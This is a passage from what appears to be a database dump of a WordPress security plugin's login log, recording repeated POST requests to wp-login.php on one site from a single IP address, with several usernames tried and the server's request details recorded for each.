"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981595.08286;s:12:\"REQUEST_TIME\";i:1746981595;}}','13.233.245.36',1,'2025-05-11 22:09:56','2025-05-12 23:29:05'),(95520,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981595.0839491;s:12:\"REQUEST_TIME\";i:1746981595;}}','13.233.245.36',1,'2025-05-11 22:09:56','2025-05-12 23:29:05'),(95521,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981943.5694971;s:12:\"REQUEST_TIME\";i:1746981943;}}','13.233.245.36',1,'2025-05-11 22:15:45','2025-05-12 23:29:05'),(95522,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981943.5744851;s:12:\"REQUEST_TIME\";i:1746981943;}}','13.233.245.36',1,'2025-05-11 22:15:45','2025-05-12 23:29:05'),(95523,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981943.5737691;s:12:\"REQUEST_TIME\";i:1746981943;}}','13.233.245.36',1,'2025-05-11 22:15:45','2025-05-12 23:29:05'),(95524,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981943.5676839;s:12:\"REQUEST_TIME\";i:1746981943;}}','13.233.245.36',1,'2025-05-11 22:15:45','2025-05-12 23:29:05'),(95525,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981943.57777;s:12:\"REQUEST_TIME\";i:1746981943;}}','13.233.245.36',1,'2025-05-11 22:15:45','2025-05-12 23:29:05'),(95526,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982291.4982879;s:12:\"REQUEST_TIME\";i:1746982291;}}','13.233.245.36',1,'2025-05-11 22:21:33','2025-05-12 23:29:05'),(95527,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982291.4973519;s:12:\"REQUEST_TIME\";i:1746982291;}}','13.233.245.36',1,'2025-05-11 22:21:33','2025-05-12 23:29:05'),(95528,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982291.5005331;s:12:\"REQUEST_TIME\";i:1746982291;}}','13.233.245.36',1,'2025-05-11 22:21:33','2025-05-12 23:29:05'),(95529,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982291.4956269;s:12:\"REQUEST_TIME\";i:1746982291;}}','13.233.245.36',1,'2025-05-11 22:21:33','2025-05-12 23:29:05'),(95530,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/